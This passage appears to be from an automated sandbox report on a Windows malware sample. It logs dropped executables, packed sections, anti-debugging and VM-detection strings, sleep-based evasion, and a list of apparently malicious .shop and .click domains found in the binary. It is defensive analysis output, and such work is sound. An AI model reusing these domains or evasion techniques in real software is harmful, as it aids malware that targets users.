    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeSection loaded: pcacli.dllJump to behavior
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeSection loaded: sfc_os.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeSection loaded: msimg32.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeSection loaded: msvcr100.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeSection loaded: webio.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

    Data Obfuscation

    barindex
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeUnpacked PE file: 0.2.lBb4XI4eGD.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.tijani:W;.kafej:W;.fat:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeUnpacked PE file: 3.2.E6F4.tmp.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.nosu:W;.muwav:W;.roxah:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeUnpacked PE file: 0.2.lBb4XI4eGD.exe.400000.0.unpack
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeUnpacked PE file: 3.2.E6F4.tmp.exe.400000.0.unpack
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: 0_2_0041EC4E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0041EC4E
    Source: lBb4XI4eGD.exeStatic PE information: section name: .tijani
    Source: lBb4XI4eGD.exeStatic PE information: section name: .kafej
    Source: lBb4XI4eGD.exeStatic PE information: section name: .fat
    Source: ScreenUpdateSync[1].exe.0.drStatic PE information: section name: .nosu
    Source: ScreenUpdateSync[1].exe.0.drStatic PE information: section name: .muwav
    Source: ScreenUpdateSync[1].exe.0.drStatic PE information: section name: .roxah
    Source: E6F4.tmp.exe.0.drStatic PE information: section name: .nosu
    Source: E6F4.tmp.exe.0.drStatic PE information: section name: .muwav
    Source: E6F4.tmp.exe.0.drStatic PE information: section name: .roxah
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: 0_2_00410756 push ecx; ret 0_2_00410769
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: 0_2_0040FD82 push ecx; ret 0_2_0040FD95
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: 0_2_0078915D push ecx; ret 0_2_0078917A
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: 0_2_007869D1 push 00000003h; ret 0_2_007869D5
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: 0_2_00784C14 push es; iretd 0_2_00784C25
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: 0_2_00785CE4 push ds; ret 0_2_00785CED
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: 0_2_00788FE0 pushad ; ret 0_2_00788FFC
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: 0_2_0217798F push esp; retf 0_2_02177997
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: 0_2_021509BD push ecx; ret 0_2_021509D0
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: 0_2_0215CE08 push es; retf 0_2_0215CE0D
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: 0_2_02177F8D push esp; retf 0_2_02177F8E
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: 0_2_0214FFE9 push ecx; ret 0_2_0214FFFC
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: 0_2_02179DD8 pushad ; retf 0_2_02179DDF
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: 0_2_0217DDCE push dword ptr [esp+ecx-75h]; iretd 0_2_0217DDD2
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_00441850 push eax; mov dword ptr [esp], 0E0908DBh3_2_00441853
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_005AB05A push ebp; iretd 3_2_005AB05D
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_005C1AB7 push eax; mov dword ptr [esp], 0E0908DBh3_2_005C1ABA
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_0060817D pushfd ; ret 3_2_0060817E
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_0060613E push ebx; ret 3_2_0060613F
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_00608112 pushad ; ret 3_2_00608113
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_00606CE6 push esi; retn 001Ch3_2_00606CEA
    Source: lBb4XI4eGD.exeStatic PE information: section name: .text entropy: 7.5444950111318025
    Source: ScreenUpdateSync[1].exe.0.drStatic PE information: section name: .text entropy: 7.417548317236182
    Source: E6F4.tmp.exe.0.drStatic PE information: section name: .text entropy: 7.417548317236182
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\ScreenUpdateSync[1].exeJump to dropped file
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeFile created: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeJump to dropped file
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: 0_2_0040E96A GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0040E96A
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeWindow / User API: threadDelayed 1773Jump to behavior
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeWindow / User API: threadDelayed 8213Jump to behavior
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-65116
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeAPI coverage: 5.1 %
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exe TID: 5724Thread sleep count: 1773 > 30Jump to behavior
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exe TID: 5724Thread sleep time: -1280106s >= -30000sJump to behavior
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exe TID: 5724Thread sleep count: 8213 > 30Jump to behavior
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exe TID: 5724Thread sleep time: -5929786s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exe TID: 5588Thread sleep time: -30000s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exe TID: 6336Thread sleep time: -30000s >= -30000sJump to behavior
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeLast function: Thread delayed
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeLast function: Thread delayed
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: 0_2_004389E2 FindFirstFileExW,0_2_004389E2
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: 0_2_02178C49 FindFirstFileExW,0_2_02178C49
    Source: Amcache.hve.6.drBinary or memory string: VMware
    Source: Amcache.hve.6.drBinary or memory string: VMware Virtual USB Mouse
    Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin
    Source: Amcache.hve.6.drBinary or memory string: VMware-42 27 c5 9a 47 85 d6 84-53 49 ec ec 87 a6 6d 67
    Source: Amcache.hve.6.drBinary or memory string: VMware, Inc.
    Source: Amcache.hve.6.drBinary or memory string: VMware20,1hbin@
    Source: Amcache.hve.6.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
    Source: Amcache.hve.6.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: Amcache.hve.6.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
    Source: lBb4XI4eGD.exe, 00000000.00000002.3954535854.000000000082D000.00000004.00000020.00020000.00000000.sdmp, lBb4XI4eGD.exe, 00000000.00000002.3954535854.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651059990.0000000000648000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588256646.0000000000691000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651189199.0000000000691000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: Amcache.hve.6.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: Amcache.hve.6.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
    Source: Amcache.hve.6.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
    Source: Amcache.hve.6.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: Amcache.hve.6.drBinary or memory string: vmci.sys
    Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin`
    Source: Amcache.hve.6.drBinary or memory string: \driver\vmci,\driver\pci
    Source: E6F4.tmp.exe, 00000003.00000003.1588256646.0000000000691000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651189199.0000000000691000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
    Source: Amcache.hve.6.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: Amcache.hve.6.drBinary or memory string: VMware20,1
    Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Generation Counter
    Source: Amcache.hve.6.drBinary or memory string: NECVMWar VMware SATA CD00
    Source: Amcache.hve.6.drBinary or memory string: VMware Virtual disk SCSI Disk Device
    Source: Amcache.hve.6.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
    Source: Amcache.hve.6.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
    Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
    Source: Amcache.hve.6.drBinary or memory string: VMware PCI VMCI Bus Device
    Source: Amcache.hve.6.drBinary or memory string: VMware VMCI Bus Device
    Source: Amcache.hve.6.drBinary or memory string: VMware Virtual RAM
    Source: Amcache.hve.6.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
    Source: Amcache.hve.6.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_004402C0 LdrInitializeThunk,3_2_004402C0
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: 0_2_0042A3C3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0042A3C3
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: 0_2_0041EC4E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0041EC4E
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: 0_2_0042FE4F mov eax, dword ptr fs:[00000030h]0_2_0042FE4F
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: 0_2_007836A3 push dword ptr fs:[00000030h]0_2_007836A3
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: 0_2_021700B6 mov eax, dword ptr fs:[00000030h]0_2_021700B6
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: 0_2_0214092B mov eax, dword ptr fs:[00000030h]0_2_0214092B
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: 0_2_02140D90 mov eax, dword ptr fs:[00000030h]0_2_02140D90
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_0058092B mov eax, dword ptr fs:[00000030h]3_2_0058092B
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_00580D90 mov eax, dword ptr fs:[00000030h]3_2_00580D90
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_0060306B push dword ptr fs:[00000030h]3_2_0060306B
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: 0_2_0043BBB1 GetProcessHeap,0_2_0043BBB1
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: 0_2_0042A3C3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0042A3C3
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: 0_2_004104C3 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004104C3
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: 0_2_00410656 SetUnhandledExceptionFilter,0_2_00410656
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: 0_2_0040F907 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0040F907
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: 0_2_0216A62A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0216A62A
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: 0_2_0215072A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0215072A
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: 0_2_0214FB6E SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0214FB6E
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: 0_2_021508BD SetUnhandledExceptionFilter,0_2_021508BD

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Source: E6F4.tmp.exeString found in binary or memory: robinsharez.shop
    Source: E6F4.tmp.exeString found in binary or memory: handscreamny.shop
    Source: E6F4.tmp.exeString found in binary or memory: chipdonkeruz.shop
    Source: E6F4.tmp.exeString found in binary or memory: versersleep.shop
    Source: E6F4.tmp.exeString found in binary or memory: crowdwarek.shop
    Source: E6F4.tmp.exeString found in binary or memory: apporholis.shop
    Source: E6F4.tmp.exeString found in binary or memory: femalsabler.shop
    Source: E6F4.tmp.exeString found in binary or memory: soundtappysk.shop
    Source: E6F4.tmp.exeString found in binary or memory: skidjazzyric.click
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeProcess created: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exe "C:\Users\user\AppData\Local\Temp\E6F4.tmp.exe" Jump to behavior
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: 0_2_0041076B cpuid 0_2_0041076B
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: GetLocaleInfoW,0_2_004351B0
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: EnumSystemLocalesW,0_2_0043B272
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: EnumSystemLocalesW,0_2_0043B2BD
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: EnumSystemLocalesW,0_2_0043B358
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_0043B3E5
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: GetLocaleInfoW,0_2_0043B635
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_0043B75E
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: GetLocaleInfoW,0_2_0043B865
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_0043B932
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: EnumSystemLocalesW,0_2_00434DBD
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_0043AFFA
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_0217B261
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: EnumSystemLocalesW,0_2_02175024
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: GetLocaleInfoW,0_2_02175417
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: EnumSystemLocalesW,0_2_0217B4D9
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: EnumSystemLocalesW,0_2_0217B524
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: EnumSystemLocalesW,0_2_0217B5BF
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: GetLocaleInfoW,0_2_0217BACC
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_0217BB99
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: GetLocaleInfoW,0_2_0217B892
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: GetLocaleInfoW,0_2_0217B89C
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_0217B9C5
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: 0_2_004103BD GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_004103BD
